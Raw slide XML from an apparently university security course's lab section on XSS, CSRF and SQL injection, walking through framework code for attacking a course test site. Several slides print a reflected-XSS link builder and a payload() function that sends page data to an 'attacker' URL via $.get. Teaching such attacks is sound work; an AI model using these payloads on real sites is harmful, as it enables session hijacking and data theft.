                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> You will use prepared statements to protect against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Implement input sanitization against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Implement token validation against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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10848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200" dirty="0" smtClean="0"/>
              <a:t>Recap: We know how to obtain cookie info!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Diagram of a persistent XSS attack"/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" y="1219200"/>
            <a:ext cx="7979987" cy="4525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533400" y="6096000"/>
            <a:ext cx="8153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Source: excess-xss.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36272655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Token validation is one of methods to protect users from CSRF.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Meanwhile, other vulnerabilities like XSS can invalidate this protection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can you think of ways to make CSRF attacks on this website without using XSS vulnerability?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274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Framework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In last part of checkpoint 2, you need to make XSS attacks against Bungle with different defense parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We provided you a framework code for this exercise.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84412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Dissecting the source code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HTML component: not very interesting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838200" y="2514600"/>
            <a:ext cx="7543800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&lt;meta charset="utf-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ajax.googleapis.com/ajax/libs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/2.0.3/jquery.min.js"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;h3&gt;&lt;/h3&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14553177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914400" y="228600"/>
            <a:ext cx="7162800" cy="2364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xssdefense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> target = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>http://bungle.cs461.cs.Illinois.edu/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>";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attacker = "http://127.0.0.1:31337/stolen";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$(function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>    var url = makeLink(xssdefense, target, attacker);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $("h3").html("&lt;a target=\"run\" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=\"" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + "\"&gt;Try Bungle!&lt;/a&gt;");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2331509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2743200"/>
            <a:ext cx="8229600" cy="3581400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The “main()” part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(it is actually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Query)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create a link using helper function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>makeLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and display in on &lt;h3&gt; tag using html() function (There is no # for HTML tags)</a:t>
            </a:r>
          </a:p>
          <a:p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762000" y="149770"/>
            <a:ext cx="7162800" cy="23648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err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xssdefense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> target = "http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://bungle.cs461.cs.Illinois.edu/";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attacker = "http://127.0.0.1:31337/stolen";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$(function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>    var url = makeLink(xssdefense, target, attacker);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $("h3").html("&lt;a target=\"run\" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=\"" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + "\"&gt;Try Bungle!&lt;/a&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>});</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39270504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625699" y="152400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makeLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xssdefense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, target, attacker) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xssdefense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> == 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        return target + "./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search?xssdefense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xssdefense.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() + "&amp;q=" + </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("&lt;script" + "&gt;" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>payload.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                               ";payload(\"" + attacker + "\");&lt;/script" + "&gt;");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// Implement code to defeat XSS defenses here.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43598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563" y="2832279"/>
            <a:ext cx="8229600" cy="3306763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>makeLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> uses helper function payload() which creates payload for this exercise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why do we need to append </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>payload.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()?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625699" y="152400"/>
            <a:ext cx="7620000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makeLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xssdefense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, target, attacker) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xssdefense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> == 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        return target + "./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search?xssdefense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xssdefense.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() + "&amp;q=" + </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("&lt;script" + "&gt;" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>payload.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                               ";payload(\"" + attacker + "\");&lt;/script" + "&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    } else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        // Implement code to defeat XSS defenses here.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139715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381000" y="228600"/>
            <a:ext cx="8229600" cy="655564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/>
              <a:t>function payload(attacker) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>    function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>log(data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>        console.log($.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>        $.get(attacker, data);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  function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>proxy(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>        $("html").load(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, function(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>            $("html").show();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" sz="2800" dirty="0"/>
              <a:t>            log(attacker, {event: "nav", uri: href});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>            $("#query").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>pwned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>!");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>        }); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>    $("html").hide();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>    proxy(attacker, "./");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="28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254114514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log(attacker, data) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        console.log($.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(data));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        $.get(attacker, data);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3278046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57199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 smtClean="0"/>
              <a:t>What is CSRF?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>What is XSS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>What is SQL Injection?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altLang="ko-KR" spc="-5" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Demo using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" spc="-45" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DVWA  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>tp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" spc="-204" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>a.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>o.u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="heavy" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0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9902535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57200"/>
            <a:ext cx="8229600" cy="5668963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function log(attacker, data) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        console.log($.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(data));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        $.get(attacker, data);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>log() is a helper function which logs the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> given as a parameter on console.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In addition, this function makes a get request to a URL value stored in parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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54399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3234"/>
            <a:ext cx="6629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function proxy(attacker, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>href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        $("html").load(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, function(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>            $("html").show();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" sz="2800" dirty="0" smtClean="0"/>
              <a:t>            log(attacker, {event: "nav", uri: href});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>            $("#query").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
